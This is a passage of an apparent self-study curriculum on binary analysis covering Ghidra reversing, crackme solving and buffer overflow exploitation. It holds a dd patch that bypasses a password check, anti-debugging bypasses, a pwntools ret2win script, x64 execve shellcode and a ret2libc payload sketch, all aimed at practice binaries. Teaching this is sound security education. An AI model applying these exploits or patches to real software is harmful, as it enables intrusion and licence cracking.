Book Reference: โ€œPractical Binary Analysisโ€ Ch. 6.3 - Disassembly and Binary Analysis Fundamentals

5. Symbol Resolution

Binaries often lack symbol names. Learning to identify functions by their behavior (string references, API calls) is critical.

Guiding Questions:

  • How do you identify main() in a stripped binary?
  • What patterns indicate a function is a constructor vs destructor?
  • How do import tables help identify library functions?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 5 - Basic Binary Analysis in Linux

6. Cross-References (Xrefs)

Xrefs show where data/code is used. Theyโ€™re essential for understanding program flow and finding all uses of a particular function or string.

Guiding Questions:

  • Whatโ€™s the difference between โ€œcalls toโ€ and โ€œcalled byโ€ in xref analysis?
  • How do you use xrefs to find all error-handling code paths?
  • Why do string references often lead directly to interesting functionality?

Book Reference: โ€œGhidra Software Reverse Engineering for Beginnersโ€ Ch. 3

7. Calling Conventions

Different platforms pass arguments differently (stack vs registers, order, cleanup responsibility). Ghidra auto-detects these but you need to verify.

Guiding Questions:

  • Whatโ€™s the difference between __cdecl, __stdcall, and __fastcall?
  • How does x64โ€™s register-based calling differ from x86โ€™s stack-based?
  • When does Ghidra get calling conventions wrong?

Book Reference: โ€œLow-Level Programmingโ€ Ch. 9 - Calling Conventions

8. Ghidra Scripting API

Automating analysis with scripts lets you handle repetitive tasks (renaming, searching, reporting) efficiently.

Guiding Questions:

  • Whatโ€™s the difference between Ghidraโ€™s Java API and Python (Ghidrathon)?
  • How do you iterate over all functions in a program?
  • When should you write a script vs use built-in features?

Book Reference: Official Ghidra API Documentation (included with Ghidra)

Questions to Guide Your Design

  1. How do you efficiently navigate a 100,000-line decompiled binary to find the password validation logic? Consider string searches, API call tracking, and symbolic execution.

  2. When Ghidraโ€™s decompiler produces confusing code (nested ternaries, weird casts), what strategies help you simplify it? Think about variable renaming, type fixing, and understanding the original source idiom.

  3. How would you write a script to find all uses of dangerous functions (strcpy, gets, sprintf) across multiple binaries? Consider iteration, filtering, and reporting.

  4. What workflow lets you collaborate with teammates on reversing a large binary? Think about Ghidra project sharing, version control, and annotation standards.

  5. How do you handle obfuscated or packed binaries that confuse Ghidraโ€™s auto-analysis? Consider manual disassembly, unpacking, and custom analysis passes.

  6. Whatโ€™s your process for documenting your reverse engineering findings so others can understand them? Think about commenting standards, structure diagrams, and pseudocode.

  7. How would you diff two versions of a binary to find what changed in a security patch? Consider Ghidraโ€™s version tracking and binary diffing capabilities.

  8. When analyzing malware, what sandbox/isolation setup ensures your Ghidra analysis doesnโ€™t trigger malicious behavior? Think about static vs dynamic analysis boundaries.

Thinking Exercise

Before writing any Ghidra scripts, complete this exercise:

  1. Manual CFG Construction: Take a simple crackme binary (20-30 functions). Draw the control flow graph of the password validation function by hand:
    • Identify basic blocks (sequences ending in jumps/branches)
    • Draw edges for conditional and unconditional jumps
    • Label edges with conditions (e.g., โ€œpassword correctโ€, โ€œlength check failedโ€)
    • Mark which paths lead to success vs failure
  2. Type Inference Practice: Look at this decompiled snippet:
    undefined8 FUN_00401234(long param_1) {
        long lVar1;
        lVar1 = param_1 + 0x10;
        *lVar1 = 0x41414141;
        return 0;
    }
    

    Without running it, infer:

    • Is param_1 a struct pointer? Array? Something else?
    • What type should lVar1 be (not just long)?
    • Whatโ€™s really happening in *lVar1 = 0x41414141?
    • Rewrite it with meaningful names and types.
  3. Cross-Reference Tracing: In a binary with debug symbols removed:
    • Find the string โ€œInvalid passwordโ€ in Ghidra
    • Use xrefs to find which function displays it
    • Trace back to find what calls that function
    • Continue until you find the entry point (main)
    • Document the call chain: main() -> login_handler() -> validate_password() -> error_message()
  4. API Identification: Open a Windows PE binary in Ghidra:
    • List all imported DLLs and functions (use Imports window)
    • Categorize APIs: networking (ws2_32.dll), crypto (advapi32.dll), file I/O (kernel32.dll)
    • For each interesting import, find all calls to it
    • Infer program capabilities (e.g., โ€œConnects to network, encrypts filesโ€)

The Interview Questions Theyโ€™ll Ask

  1. โ€œExplain how Ghidraโ€™s decompiler works at a high level. What are the major stages?โ€ Expected: Disassembly โ†’ CFG construction โ†’ P-Code conversion โ†’ SSA form โ†’ Type inference โ†’ C code generation

  2. โ€œYouโ€™re reversing a binary and Ghidra shows a function with 50 parameters. What went wrong and how do you fix it?โ€ Expected: Ghidra misidentified the calling convention or function boundary. Check for stack frame setup, use โ€œEdit Function Signatureโ€, verify with debugging.

  3. โ€œHow would you use Ghidra to find all SQL injection vulnerabilities in a closed-source web server binary?โ€ Expected: Search for SQL keywords in strings, xref to find query-building code, trace backwards to find unsanitized user input paths.

  4. โ€œWhatโ€™s the difference between Ghidraโ€™s P-Code and LLVM IR? Why does Ghidra use P-Code?โ€ Expected: P-Code is designed for decompilation (reverse direction), LLVM IR for compilation (forward). P-Code is simpler and architecture-neutral.

  5. โ€œWalk me through your process for analyzing a stripped binary with no symbols.โ€ Expected: Find entry point โ†’ identify main (heuristics: called once, calls many) โ†’ name key functions โ†’ follow interesting strings โ†’ build call graph.

  6. โ€œYou need to analyze 100 similar malware samples. How do you automate commonality extraction with Ghidra?โ€ Expected: Write headless Ghidra script to batch-process samples, extract features (strings, APIs, crypto constants), generate similarity matrix.

  7. โ€œGhidraโ€™s decompiler shows code that couldnโ€™t possibly compile. Give three reasons why.โ€ Expected: Hand-written assembly with no C equivalent, compiler optimizations (like overlapping variables), incorrect type inference.

  8. โ€œHow do you identify crypto algorithms (AES, SHA256) in decompiled code?โ€ Expected: Look for characteristic constants (AES S-box: 0x63, 0x7cโ€ฆ), specific bit operations, large lookup tables, entropy analysis.

  9. โ€œWhat are the limitations of static analysis with Ghidra vs dynamic analysis with a debugger?โ€ Expected: Static canโ€™t handle runtime unpacking/decryption, indirect calls, or input-dependent behavior. Dynamic requires execution environment.

  10. โ€œDescribe a real scenario where writing a Ghidra script saved you significant time.โ€ Expected: Personal example, e.g., โ€œFound all format string bugs in a 500KB binary by automating xref analysis of printf-family functions.โ€

Books That Will Help

Topic Book Chapter/Section
Ghidra Basics & UI โ€œGhidra Software Reverse Engineering for Beginnersโ€ Ch. 1-4 (Installation, UI, Basic Analysis)
Decompilation Theory โ€œPractical Binary Analysisโ€ Ch. 6 (Binary Analysis Fundamentals)
Control Flow Graphs โ€œPractical Binary Analysisโ€ Ch. 7 (Simple Code Injection)
x86/x64 Assembly โ€œLow-Level Programmingโ€ Ch. 3-4 (Assembly Language, Syntax)
Calling Conventions โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7 (Procedures)
Stack Frames โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7.5 (Stack Frames)
Symbol Tables & Linking โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 7 (Linking)
Reverse Engineering Methodology โ€œReversing: Secrets of Reverse Engineeringโ€ Ch. 1-3 (Foundations)
Static Analysis Techniques โ€œPractical Malware Analysisโ€ Ch. 1, 5 (Basic Static Analysis)
Ghidra Scripting (Java) Official Ghidra Docs GhidraAPI.html (included)
Ghidra Scripting (Python) Ghidrathon GitHub Docs README and examples
Binary File Formats (ELF) โ€œPractical Binary Analysisโ€ Ch. 2 (ELF Format)
Binary File Formats (PE) โ€œPractical Binary Analysisโ€ Ch. 2 (PE Format)
Data Flow Analysis โ€œCompilers: Principles, Techniques, and Toolsโ€ (Dragon Book) Ch. 9 (Machine-Independent Optimizations)
Type Inference โ€œPractical Binary Analysisโ€ Ch. 6.3 (Disassembly)
Advanced Reversing โ€œThe IDA Pro Bookโ€ Ch. 5-8 (applies to Ghidra too)

Project 6: Crackme Challenges

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: Assembly analysis, Python for keygens
  • Alternative Programming Languages: Any
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 2: Intermediate
  • Knowledge Area: Reverse Engineering / Password Bypass
  • Software or Tool: Ghidra, GDB, crackmes.one
  • Main Book: โ€œReversing: Secrets of Reverse Engineeringโ€ by Eldad Eilam

What youโ€™ll build: Solve 10+ crackme challenges of increasing difficulty, learning patching, keygen writing, and anti-debugging bypass.

Why it teaches binary analysis: Crackmes are purpose-built learning tools. They teach you to find and understand password checks, then bypass them.

Core challenges youโ€™ll face:

  • Finding the check โ†’ maps to string references, control flow
  • Understanding the algorithm โ†’ maps to decompilation, debugging
  • Patching vs keygen โ†’ maps to two approaches to bypass
  • Anti-debugging โ†’ maps to detection evasion

Resources for key challenges:

Key Concepts:

  • Patching: Tutorial #10 - The Levels of Patching
  • Keygen Writing: โ€œReversingโ€ Ch. 5 - Eilam
  • Anti-Debugging Bypass: OpenRCE Anti-Reversing Database

Difficulty: Intermediate Time estimate: 2-4 weeks Prerequisites: Projects 4-5 (GDB, Ghidra)

Real world outcome:

# Approach 1: Patching
$ ./crackme
Enter password: wrong
Access Denied!

# Found the check: JNE (jump if not equal) to fail
# Patch JNE to JE (or NOP it out)
$ xxd crackme | grep "75 28"
00001234: 75 28  # JNE +0x28
$ printf '\x90\x90' | dd of=crackme bs=1 seek=4660 conv=notrunc
$ ./crackme
Enter password: anything
Access Granted!

# Approach 2: Keygen
# Found algorithm: password = (username XOR 0x55) + 0x1337
$ python3 keygen.py "admin"
Valid password for 'admin': 0xAB12CD34

Implementation Hints:

Systematic approach:

  1. Run the binary to understand expected behavior
  2. Find strings (โ€œEnter passwordโ€, โ€œAccess Deniedโ€)
  3. Find cross-references to those strings
  4. Trace backwards to find the comparison
  5. Understand what makes it pass
  6. Either patch the jump or write a keygen

Patching levels:

  1. LAME: NOP out the check entirely
  2. Better: Invert the jump condition
  3. Good: Patch the comparison to always succeed
  4. Best: Understand algorithm, write keygen

Questions:

  • Whatโ€™s the difference between JE and JNE?
  • How do you find the password comparison in decompiled code?
  • What are common string comparison functions?

Learning milestones:

  1. Solve easy crackmes โ†’ Find obvious password checks
  2. Understand algorithms โ†’ XOR, hashing, encoding
  3. Write keygens โ†’ Reverse the algorithm
  4. Bypass protections โ†’ Handle obfuscation

The Core Question Youโ€™re Answering

How do you systematically reverse engineer authentication mechanisms, understand their underlying algorithms, and create tools to bypass or generate valid credentialsโ€”all without source code?

This project teaches the complete reverse engineering workflow: from initial binary exploration to algorithm extraction to automated solution generation. Youโ€™ll learn both the โ€œquick and dirtyโ€ approach (patching) and the โ€œdeep understandingโ€ approach (keygen writing).

Concepts You Must Understand First

1. String References and Cross-References

Most crackmes leave clues in strings (โ€œCorrect!โ€, โ€œWrong passwordโ€). Learning to trace from strings to code is your first reverse engineering skill.

Guiding Questions:

  • Why do string references often lead directly to validation logic?
  • How do you distinguish between format strings and actual password strings?
  • What happens when strings are obfuscated or encrypted at runtime?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 5.4 - Finding Main Manually

2. Comparison Operations in Assembly

Password checks ultimately boil down to comparisons: cmp, test, sub followed by conditional jumps. Recognizing these patterns is essential.

Guiding Questions:

  • Whatโ€™s the difference between cmp rax, rbx and test rax, rax?
  • How do je, jne, jz, jnz relate to the zero flag?
  • Why does sub set flags differently than cmp?

Book Reference: โ€œLow-Level Programmingโ€ Ch. 5 - Arithmetic and Logical Operations

3. Control Flow Manipulation (Patching)

The simplest bypass is changing a conditional jump (je โ†’ jne) or removing checks entirely (NOP padding).

Guiding Questions:

  • Whatโ€™s the opcode for jne vs je, and how do you swap them?
  • Why is NOPing (0x90) preferred over zeroing bytes?
  • How do you ensure patch size matches original instruction size?

Book Reference: โ€œHacking: The Art of Exploitationโ€ Ch. 3 - Exploitation

4. Common Validation Algorithms

Crackmes use predictable patterns: XOR encoding, simple hashing (MD5/SHA), base64, character manipulation.

Guiding Questions:

  • How do you recognize XOR in assembly (repeated xor with constants)?
  • What does a SHA256 implementation look like in decompiled code?
  • How do you distinguish encryption from simple obfuscation?

Book Reference: โ€œReversing: Secrets of Reverse Engineeringโ€ Ch. 5 - Applied Reverse Engineering

5. Keygen Development

Once you understand the algorithm, you reverse it: if validation does hash(input) == stored_hash, your keygen does input = reverse_hash(stored_hash).

Guiding Questions:

  • What algorithms are reversible (XOR, Caesar cipher) vs irreversible (SHA256)?
  • How do you handle one-way hashes (hint: you canโ€™t reverse them)?
  • When is it easier to brute force than to write a perfect keygen?

Book Reference: โ€œReversing: Secrets of Reverse Engineeringโ€ Ch. 5

6. Anti-Debugging Basics

Some crackmes detect debuggers using ptrace, timing checks, or IsDebuggerPresent(). Youโ€™ll need to recognize and bypass these.

Guiding Questions:

  • How does the ptrace(PTRACE_TRACEME) trick detect debuggers?
  • Whatโ€™s a timing-based anti-debug check and how do you defeat it?
  • Why do debuggers change program behavior even without breakpoints?

Book Reference: โ€œPractical Malware Analysisโ€ Ch. 15 - Anti-Debugging

7. Binary Patching Tools and Techniques

Youโ€™ll need to modify binaries with hex editors, dd, or specialized tools like radare2 or Binary Ninja.

Guiding Questions:

  • How do you find the file offset of a memory address in an ELF/PE binary?
  • Whatโ€™s the difference between patching in-memory vs on-disk?
  • How do you verify your patch didnโ€™t corrupt the binary?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 7 - Simple Code Injection

8. Input Validation and User Input Flow

Understanding where user input enters (stdin, argv, environment variables) and how itโ€™s processed helps you trace to the validation logic.

Guiding Questions:

  • How do you identify scanf, fgets, or read calls in disassembly?
  • Where does command-line input (argv) appear in the program state?
  • How do you trace tainted input through the program?

Book Reference: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 8.4 - Process Control

Questions to Guide Your Design

  1. Given a crackme that accepts a serial number, whatโ€™s your systematic process to find the validation function? Consider strings, imports, control flow, and data flow.

  2. When is patching preferable to writing a keygen, and vice versa? Think about time investment, learning value, and reusability.

  3. How would you approach a crackme that generates a unique serial for each userโ€™s machine (HWID-based)? Consider what machine identifiers it might use (MAC address, disk serial, CPU ID).

  4. What strategies help when the password check is heavily obfuscated (no strings, indirect jumps)? Think about dynamic analysis, symbolic execution, and emulation.

  5. How do you build a test suite for your keygen to ensure it works for all inputs? Consider edge cases, random testing, and comparing against the original binary.

  6. When a crackme uses a cryptographic hash (SHA256), what are your options since you canโ€™t reverse it? Think about rainbow tables, brute force, or patching the comparison.

  7. How would you document your reverse engineering process so others can learn from your analysis? Consider annotated disassembly, step-by-step walkthroughs, and algorithm explanations.

  8. What ethical and legal considerations apply to cracking software, even in a learning context? Think about responsible disclosure, CTF vs commercial software, and intent.

Thinking Exercise

Before attempting any crackmes, complete this exercise:

  1. Manual Algorithm Reversal: Hereโ€™s a simple validation function in C:
    int validate(char *input) {
        int sum = 0;
        for (int i = 0; i < strlen(input); i++) {
            sum += input[i] ^ 0x42;
        }
        return sum == 0x1337;
    }
    
    • Compile it (without optimization: gcc -O0)
    • Disassemble it with objdump or load in Ghidra
    • Identify the loop structure in assembly
    • Find the XOR operation and the constant 0x42
    • Find the final comparison with 0x1337
    • Write a keygen in Python that generates valid inputs
  2. Patch Practice: Create a simple password checker:
    #include <stdio.h>
    #include <string.h>
    int main() {
        char pass[32];
        printf("Password: ");
        scanf("%s", pass);
        if (strcmp(pass, "secret") == 0) {
            printf("Correct!\n");
        } else {
            printf("Wrong!\n");
        }
    }
    
    • Compile it
    • Find the strcmp call in assembly (use objdump -d or Ghidra)
    • Note the conditional jump after the comparison
    • Patch the binary three ways:
      • Method 1: Change jne to je (swap success/failure)
      • Method 2: NOP out the entire check
      • Method 3: Change the comparison to cmp rax, rax (always equal)
    • Verify each patch works
  3. Trace User Input: Take this program:
    int main(int argc, char **argv) {
        if (argc != 2) return 1;
        int key = atoi(argv[1]);
        key = (key * 13) + 37;
        key ^= 0xDEADBEEF;
        if (key == 0x12345678) {
            printf("Win!\n");
        }
    }
    
    • Trace argv[1] through each transformation
    • Write the mathematical inverse: key = ((target ^ 0xDEADBEEF) - 37) / 13
    • Implement in Python and find the winning input
    • Verify by running the original binary
  4. Anti-Debug Detection: Create a program with ptrace anti-debugging:
    #include <sys/ptrace.h>
    #include <stdio.h>
    int main() {
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) {
            printf("Debugger detected!\n");
            return 1;
        }
        printf("Not debugging\n");
        // rest of program
    }
    
    • Try running it under GDB (it will detect the debugger)
    • Bypass it by:
      • Method 1: Patching the ptrace call to always return 0
      • Method 2: Setting a breakpoint before ptrace and changing the return value
      • Method 3: Using LD_PRELOAD to hook ptrace

The Interview Questions Theyโ€™ll Ask

  1. โ€œWalk me through your methodology for solving an unknown crackme from start to finish.โ€ Expected: Run it โ†’ check strings โ†’ find validation โ†’ understand algorithm โ†’ patch or keygen โ†’ verify success.

  2. โ€œWhatโ€™s the difference between je and jne at the opcode level, and how would you patch one to the other?โ€ Expected: je (0x74), jne (0x75). They differ by one bit. Patch by changing byte at that offset.

  3. โ€œYou find this assembly: xor eax, eax; test eax, eax; je 0x401234. Whatโ€™s happening and is there a shortcut?โ€ Expected: xor eax, eax zeroes eax, test sets zero flag, je always jumps. Shortcut: jmp 0x401234.

  4. โ€œHow would you approach a crackme that checks username AND serial number together (no valid serial without the right username)?โ€ Expected: Trace both inputs, find where theyโ€™re combined (concatenation, XOR), understand the relationship, write a keygen that takes username as input.

  5. โ€œExplain three different patching strategies and when youโ€™d use each.โ€ Expected: (1) Invert jumpโ€”quick but obvious; (2) NOP the checkโ€”clean; (3) Change comparison targetโ€”stealthy. Use based on goals (speed vs stealth).

  6. โ€œA crackme uses MD5(serial) == โ€˜abc123โ€ฆโ€™. Can you write a keygen? What are your options?โ€ Expected: Canโ€™t reverse MD5. Options: brute force (if short), rainbow table lookup, or patch the comparison.

  7. โ€œHow do you identify a validation loop (character-by-character check) in disassembly?โ€ Expected: Look for loop structures (counter increment, conditional jump back), array indexing, character-wise operations.

  8. โ€œWhatโ€™s the โ€˜cyclic patternโ€™ technique and how is it useful in crackmes?โ€ Expected: Generates unique substrings to identify buffer positions. Useful for finding offset to critical data in password buffers.

  9. โ€œYouโ€™ve reversed the algorithm but your keygen produces โ€˜validโ€™ serials that the program rejects. What went wrong?โ€ Expected: Likely issues: integer overflow, endianness, off-by-one errors, missing constraints (e.g., serial must be printable ASCII).

  10. โ€œDescribe the legal and ethical boundaries of reverse engineering copy protection.โ€ Expected: CTF/educational crackmes are legal. Commercial software varies by jurisdiction (DMCA, EU directives). Intent matters. Always use isolated VMs.

Books That Will Help

Topic Book Chapter/Section
Reverse Engineering Fundamentals โ€œReversing: Secrets of Reverse Engineeringโ€ Ch. 1-3 (Foundations, RE Process)
Applied Crackme Solving โ€œReversing: Secrets of Reverse Engineeringโ€ Ch. 5 (Applied RE)
x86/x64 Comparison Operations โ€œLow-Level Programmingโ€ Ch. 5.3 (Conditional Jumps)
Control Flow in Assembly โ€œLow-Level Programmingโ€ Ch. 6 (Control Flow)
String Analysis โ€œPractical Binary Analysisโ€ Ch. 5.4 (Finding Functions)
Binary Patching Techniques โ€œPractical Binary Analysisโ€ Ch. 7 (Code Injection)
Debugger Usage (GDB) โ€œHacking: The Art of Exploitationโ€ Ch. 2 (Programming)
Anti-Debugging Techniques โ€œPractical Malware Analysisโ€ Ch. 15 (Anti-Debugging)
Common Crypto Algorithms โ€œSerious Cryptographyโ€ Ch. 1-6 (Hashing, Encryption)
Assembly Language Basics โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3 (Machine-Level Representation)
Stack and Calling Conventions โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7 (Procedures)
Tool Usage (Ghidra) โ€œGhidra Software Reverse Engineering for Beginnersโ€ Ch. 4-6 (Analysis Features)
Input Tracing โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 8.4 (Process Control)
Opcode Reference โ€œLow-Level Programmingโ€ Appendix A (x86-64 Instruction Reference)
Hex Editing and Binary Structure โ€œPractical Binary Analysisโ€ Ch. 2 (Binary Formats)

Project 7: Buffer Overflow Exploitation

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (targets), Python (exploits)
  • Alternative Programming Languages: Assembly for shellcode
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The โ€œResume Goldโ€
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Binary Exploitation / Memory Corruption
  • Software or Tool: GDB, pwntools, checksec
  • Main Book: โ€œHacking: The Art of Exploitationโ€ by Jon Erickson

What youโ€™ll build: Working exploits for buffer overflow vulnerabilities, progressing from simple stack smashing to bypass ASLR and stack canaries.

Why it teaches binary analysis: Understanding exploitation gives you insight into why security mitigations exist and how low-level memory works.

Core challenges youโ€™ll face:

  • Finding the offset โ†’ maps to pattern generation, EIP/RIP control
  • Controlling execution โ†’ maps to return address overwrite
  • Bypassing NX โ†’ maps to return-to-libc, ROP
  • Bypassing ASLR โ†’ maps to info leaks, partial overwrite

Resources for key challenges:

Key Concepts:

  • Stack Layout: โ€œHacking: Art of Exploitationโ€ Ch. 2
  • Shellcode: โ€œHacking: Art of Exploitationโ€ Ch. 5
  • Return-Oriented Programming: โ€œPractical Binary Analysisโ€ Ch. 10

Difficulty: Advanced Time estimate: 3-4 weeks Prerequisites: Projects 1-6, solid C and assembly

Real world outcome:

from pwn import *

# Connect to target
p = process('./vulnerable')

# Find offset with pattern
offset = 72

# Build payload
payload = b'A' * offset           # Fill buffer
payload += p64(0x401337)          # Overwrite return address with win()

# Send payload
p.sendline(payload)

# Get shell!
p.interactive()

# Output:
# [*] Switching to interactive mode
# $ whoami
# root
# $ cat flag.txt
# FLAG{buffer_overflow_mastered}

Implementation Hints:

Progression:

  1. ret2win: Overwrite return address to call win() function
  2. ret2shellcode: Jump to shellcode on stack (no NX)
  3. ret2libc: Return to system("/bin/sh") (bypass NX)
  4. ROP chain: Chain gadgets for complex operations
  5. GOT overwrite: Hijack function pointers
  6. Format string: Arbitrary read/write

Finding offset:

from pwn import *

# Generate cyclic pattern
pattern = cyclic(200)
# Feed to program, get crash address
# Use cyclic_find to get offset
offset = cyclic_find(0x61616168)  # 'haaa' in little-endian

Key questions:

  • How do you find the offset to the return address?
  • Whatโ€™s the difference between 32-bit and 64-bit exploitation?
  • How do you find useful libc functions when ASLR is enabled?

Learning milestones:

  1. Control EIP/RIP โ†’ Overwrite return address
  2. Execute shellcode โ†’ Spawn a shell (no NX)
  3. ROP chains โ†’ Bypass NX with gadgets
  4. Leak addresses โ†’ Bypass ASLR

The Core Question Youโ€™re Answering

How do you exploit unsafe memory operations to hijack program control flow, execute arbitrary code, and bypass modern security mitigationsโ€”all by understanding the precise layout of memory at runtime?

This project bridges theory and practice: youโ€™ll see how textbook stack diagrams become real exploitable conditions, and how security features (NX, ASLR, stack canaries) force increasingly sophisticated attack techniques.

Concepts You Must Understand First

1. The Stack Memory Layout

The stack grows downward (high to low addresses) and stores local variables, saved registers, and return addresses. Understanding this layout is essential for exploitation.

High addresses
+------------------+
| Command-line args|
| (argv, envp)     |
+------------------+
| Stack            |
| (grows down)     |
|                  |
|  +-----------+   |  <-- Current function's stack frame
|  | Local vars|   |
|  | (buffer)  |   |
|  +-----------+   |
|  | Saved RBP |   |  <-- Frame pointer (base of previous frame)
|  +-----------+   |
|  | Ret addr  |   |  <-- Return address (TARGET FOR OVERWRITE)
|  +-----------+   |
|  | Arguments |   |
|  +-----------+   |
|      ...         |
|                  |
+------------------+
| Heap             |
| (grows up)       |
+------------------+
| .bss (uninit)    |
+------------------+
| .data (init)     |
+------------------+
| .text (code)     |
+------------------+
Low addresses

Guiding Questions:

  • Why does the stack grow downward while arrays grow upward (creating overflow)?
  • Whatโ€™s stored between a buffer and the return address?
  • How does the saved frame pointer (RBP) help identify stack frame boundaries?

Book Reference: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7 - Procedures

2. Buffer Overflow Mechanics

When strcpy(buffer, user_input) copies more data than the buffer can hold, it overwrites adjacent memoryโ€”including saved RBP and return address.

Guiding Questions:

  • Why are functions like gets(), strcpy(), and sprintf() dangerous?
  • Whatโ€™s the difference between stack overflow (too much data) and stack smashing (deliberate overwrite)?
  • How do you calculate the exact offset from buffer start to return address?

Book Reference: โ€œHacking: The Art of Exploitationโ€ Ch. 2.5 - Buffer Overflows

3. Return Address Hijacking

The return address (pushed by call, popped by ret) determines where execution goes after a function. Overwriting it redirects control flow.

Guiding Questions:

  • What does the ret instruction do at the assembly level?
  • Why must your payload preserve stack alignment (especially on x64)?
  • What happens if you overwrite the return address with an invalid address?

Book Reference: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.7.3 - Data Transfer

4. Shellcode Development

Shellcode is position-independent assembly code that spawns a shell or executes commands. It must avoid null bytes (which terminate string copies).

Guiding Questions:

  • Why does shellcode use execve("/bin/sh", NULL, NULL) instead of system("/bin/sh")?
  • How do you write position-independent code (no hardcoded addresses)?
  • What techniques eliminate null bytes (e.g., xor eax, eax instead of mov eax, 0)?

Book Reference: โ€œHacking: The Art of Exploitationโ€ Ch. 5 - Shellcode

5. NX (No-Execute) Protection

Modern systems mark the stack as non-executable, preventing shellcode execution. This forces attackers to use existing code (return-to-libc, ROP).

Guiding Questions:

  • How does the NX bit work at the hardware level (page table permissions)?
  • Why canโ€™t you just mark the stack executable from your exploit?
  • Whatโ€™s the difference between DEP (Windows) and NX (Linux)?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 10.2 - Code-Reuse Attacks

6. ASLR (Address Space Layout Randomization)

ASLR randomizes the base addresses of stack, heap, and libraries, making hardcoded addresses unreliable. Defeating it requires information leaks.

Guiding Questions:

  • What parts of memory are randomized (stack, heap, libraries)?
  • Why is the code section (.text) often NOT randomized in binaries without PIE?
  • How do format string bugs or read overflows leak addresses?

Book Reference: โ€œPractical Binary Analysisโ€ Ch. 10.3 - Randomization-Based Defenses

7. Stack Canaries

Canaries are random values placed between the buffer and return address. Before returning, the program checks if the canary is intact; if not, it aborts.

Guiding Questions:

  • Where exactly is the canary placed in the stack frame?
  • How are canaries generated (random, constant, TLS-based)?
  • Can you bypass canaries by leaking their value or using partial overwrites?

Book Reference: โ€œComputer Systems: A Programmerโ€™s Perspectiveโ€ Ch. 3.10.3 - Stack Corruption Detection

8. Pwntools and Exploit Development

Pwntools is a Python library for writing exploits. It handles process interaction, payload generation, and address packing.

Guiding Questions:

  • Whatโ€™s the difference between p32() and p64() for packing addresses?
  • How does cyclic() help find the exact overflow offset?
  • When should you use process() vs remote() for local vs remote targets?

Book Reference: Official pwntools documentation (docs.pwntools.com)

Questions to Guide Your Design

  1. How do you determine the exact offset from the buffer start to the return address without source code? Consider pattern generation, crash analysis, and GDB inspection.

  2. When NX is enabled, what existing code can you reuse to achieve your goals? Think about libc functions, PLT entries, and gadgets.

  3. How would you leak a libc address to defeat ASLR in a two-stage exploit? Consider using puts() to print GOT entries.

  4. What strategies work when you can only overflow a small number of bytes (not enough for shellcode)? Think about partial overwrites, ROP, or pointer manipulation.

  5. How do you write shellcode that works regardless of where itโ€™s placed in memory? Consider relative addressing, stack pivoting, and position-independent techniques.

  6. When would you choose ret2libc over ROP, or vice versa? Think about complexity, reliability, and available gadgets.

  7. How do you test your exploits reliably when ASLR is enabled locally? Consider disabling ASLR (echo 0 > /proc/sys/kernel/randomize_va_space) or handling it properly.

  8. What debugging workflow helps when your exploit crashes the program in unexpected ways? Think about core dumps, GDB breakpoints, and payload inspection.

Thinking Exercise

Before writing any exploits, complete these exercises:

  1. Manual Stack Diagram: Draw the complete stack layout for this function call:
    void vulnerable(char *input) {
        char buffer[64];
        strcpy(buffer, input);  // No bounds checking!
    }
    
    int main(int argc, char **argv) {
        if (argc > 1) {
            vulnerable(argv[1]);
        }
        return 0;
    }
    
    • Compile with gcc -fno-stack-protector -z execstack -o vuln vuln.c
    • Run in GDB with breakpoint in vulnerable() after the strcpy()
    • Print the stack: x/40wx $rsp-0x50
    • Identify: buffer location, saved RBP, return address
    • Calculate the offset: how many bytes from buffer[0] to return address?
  2. Shellcode Analysis: Examine this x64 shellcode:
    xor rsi, rsi         ; NULL (argv)
    mul rsi              ; RAX = RDX = 0
    mov rbx, 0x68732f2f6e69622f  ; "/bin//sh" reversed
    push rbx
    push rsp
    pop rdi              ; RDI points to "/bin//sh"
    mov al, 0x3b         ; syscall number for execve
    syscall
    
    • Why use xor rsi, rsi instead of mov rsi, 0?
    • Why is the string โ€œ/bin//shโ€ instead of โ€œ/bin/shโ€?
    • Whatโ€™s the syscall number for execve on x64 Linux?
    • Assemble it and verify it has no null bytes
  3. Pattern Offset Calculation:
    from pwn import *
    
    # Generate a cyclic pattern
    pattern = cyclic(200)
    print(pattern)
    
    # Feed it to the vulnerable program
    # Say it crashes with RIP = 0x6161616c ('laaa')
    
    # Find the offset
    offset = cyclic_find(0x6161616c)
    print(f"Offset to RIP: {offset}")
    
    • Run this against a vulnerable binary
    • Verify the offset by sending b'A' * offset + b'BBBBBBBB'
    • Confirm RIP becomes 0x4242424242424242 (BBBBBBBB)
  4. NX Bypass Conceptual: Given a binary with NX enabled:
    • List all functions in the PLT (objdump -d vuln | grep @plt)
    • Find system@plt and puts@plt addresses
    • Locate the string โ€œ/bin/shโ€ in libc using strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
    • Conceptually design a ret2libc attack:
      payload = 'A' * offset
      payload += p64(pop_rdi_ret)    # Gadget to set RDI
      payload += p64(binsh_addr)     # Argument: "/bin/sh"
      payload += p64(system_addr)    # Call system
      

The Interview Questions Theyโ€™ll Ask

  1. โ€œWalk me through the exact steps of a buffer overflow from overwrite to code execution.โ€ Expected: Unsafe function โ†’ overflow buffer โ†’ overwrite saved RBP โ†’ overwrite return address โ†’ ret instruction loads attackerโ€™s address โ†’ control flow hijacked.

